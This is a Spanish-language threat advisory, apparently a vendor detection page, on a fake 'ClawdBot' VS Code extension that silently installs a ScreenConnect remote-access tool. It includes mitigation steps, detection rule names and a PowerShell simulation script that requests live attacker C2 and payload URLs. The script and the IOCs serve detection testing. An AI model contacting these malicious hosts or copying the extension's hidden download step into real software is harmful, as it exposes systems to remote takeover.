Extensión de VS Code Fake ClowdBot despliega ScreenConnect RAT
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Una extensión maliciosa de Visual Studio Code llamada ClawdBot Agent se hace pasar por un asistente de codificación con IA, pero instala de manera encubierta una herramienta de acceso remoto ScreenConnect weaponizada en Windows cuando se lanza VS Code. Al iniciar, la extensión descarga un archivo de configuración de un dominio controlado por el atacante, luego descarga y ejecuta un binario falso de VS Code (Code.exe) junto con DLLs de soporte. Como una vía de entrega secundaria, puede obtener el mismo instalador desde un enlace de Dropbox para mantener la disponibilidad de la carga útil. La campaña abusa de una herramienta de soporte de TI confiable para mezclarse con la actividad legítima de administración remota y reducir la sospecha.
Investigación
Los investigadores adquirieron el archivo package.json de la extensión, confirmaron la activación al iniciar VS Code y recuperaron la configuración JSON remota que enumera los componentes maliciosos. El análisis binario mostró módulos ScreenConnect firmados que se comunicaban con un servidor de retransmisión personalizado. Se encontró lógica adicional de respaldo en JavaScript y PowerShell, haciendo referencia a dominios secundarios y a cargas útiles alojadas en Dropbox. Se observaron artefactos en disco bajo la carpeta %TEMP%Lightshot.
Mitigación
Elimine la extensión ClawdBot Agent de VS Code y borre los archivos restantes de la ubicación de instalación de ScreenConnect y del directorio %TEMP%Lightshot. Desinstale el servicio cliente de ScreenConnect y bloquee la conectividad saliente a los dominios de retransmisión e IPs identificados. Rote cualquier clave API o secreto que pueda haber sido ingresado en la extensión.
Respuesta
Detecte la extensión maliciosa monitoreando las instalaciones de extensiones de VS Code y la creación del directorio Lightshot. Alerta sobre la ejecución de binarios Code.exe o ScreenConnect desde rutas no estándar y sobre conexiones salientes a meeting.bulletmailer.net:8041 o la dirección IP asociada. Realice análisis forense del host para confirmar la eliminación de persistencia e identificar cualquier carga útil adicional.
Flujo de Ataque
Detecciones
Software Alternativo de Acceso/ Gestión Remota (vía creation_proceso)
Ver
Descargar o Cargar vía Powershell (vía cmdline)
Ver
Software Alternativo de Acceso/ Gestión Remota (vía auditoría)
Ver
Software Alternativo de Acceso/ Gestión Remota (vía sistema)
Ver
IOCs (DestinationIP) para detectar: Instala una extensión falsa Clawdbot VS Code y ScreenConnect RAT
Ver
IOCs (SourceIP) para detectar: Instala una extensión falsa Clawdbot VS Code y ScreenConnect RAT
Ver
IOCs (HashSha256) para detectar: Instala una extensión falsa Clawdbot VS Code y ScreenConnect RAT
Ver
IOCs (Emails) para detectar: Instala una extensión falsa Clawdbot VS Code y ScreenConnect RAT
Ver
Instalaciones de Extensión Falsa ClawdBot VS Code ScreenConnect RAT [Creación de Procesos de Windows]
Ver
Detección de Instalación de Fake Clawdbot VS Code Extension Instalando ScreenConnect RAT [Conexión de Red de Windows]
Ver
Ejecución de Simulación
Requisito: Debe haber pasado la verificación previa de Telemetría y Línea de Base.
Narrativa de Ataque & Comandos
- El atacante publica una extensión trojanizada de VS Code titulado “Clawdbot Helper”.
- La víctima instala la extensión a través del Marketplace de VS Code, que ejecuta un
postinstallscript que silenciosamente descarga el cliente ScreenConnect (ScreenConnect.Client.exe) en%APPDATA%ScreenConnect. - Inmediatamente después de la instalación, el cliente inicia tres conexiones TCP salientes a los dominios C2 controlados por el atacante para recuperar cargas útiles adicionales y reportar el estado del host.
- Las conexiones salientes generan registros de Event ID 3 de Sysmon que coinciden con la
dest_iplista, cumpliendo con la regla de detección.
Script de Prueba de Regresión
# --------------------------------------------------------------
# Rutina simulada de post instalación de extensión maliciosa de VS Code
# --------------------------------------------------------------
# Paso 1 – Dejar un binario ScreenConnect simulado (simulado)
$payloadPath = "$env:APPDATAScreenConnectScreenConnect.Client.exe"
New-Item -ItemType Directory -Path (Split-Path $payloadPath) -Force | Out-Null
# Crear un binario de marcador inofensivo (por ejemplo, una copia de notepad.exe)
Copy-Item -Path "$env:SystemRootSystem32notepad.exe" -Destination $payloadPath -Force
# Paso 2 – Lanzar conexiones salientes a cada host C2
$c2Hosts = @(
"http://meeting.bulletmailer.net/collect",
"http://clawdbot.getintwopc.site/payload",
"https://www.dropbox.com/s/evilpayload.exe"
)
foreach ($url in $c2Hosts) {
try {
# Solicitud web silenciosa; -UseBasicParsing evita mensajes de UI
Invoke-WebRequest -Uri $url -Method GET -UseBasicParsing -TimeoutSec 5 | Out-Null
Write-Host "Se contactó a $url"
} catch {
Write-Host "Falló el contacto a $url (esperado en un sandbox)."
}
}
# Fin del script – en este punto Sysmon debería haber registrado tres
# eventos NetworkConnect cuyos valores DestinationIp coinciden con la regla.
Comandos de Limpieza
# --------------------------------------------------------------
# Eliminar artefactos simulados
# --------------------------------------------------------------
# Detener cualquier trabajo de PowerShell en curso (ninguno en este script simple)
Get-Job | Remove-Job -Force
# Borrar la carpeta cliente ScreenConnect simulada
Remove-Item -Path "$env:APPDATAScreenConnect" -Recurse -Force
# Opcionalmente, borrar el buffer de Sysmon (requiere admin)
# sysmon -c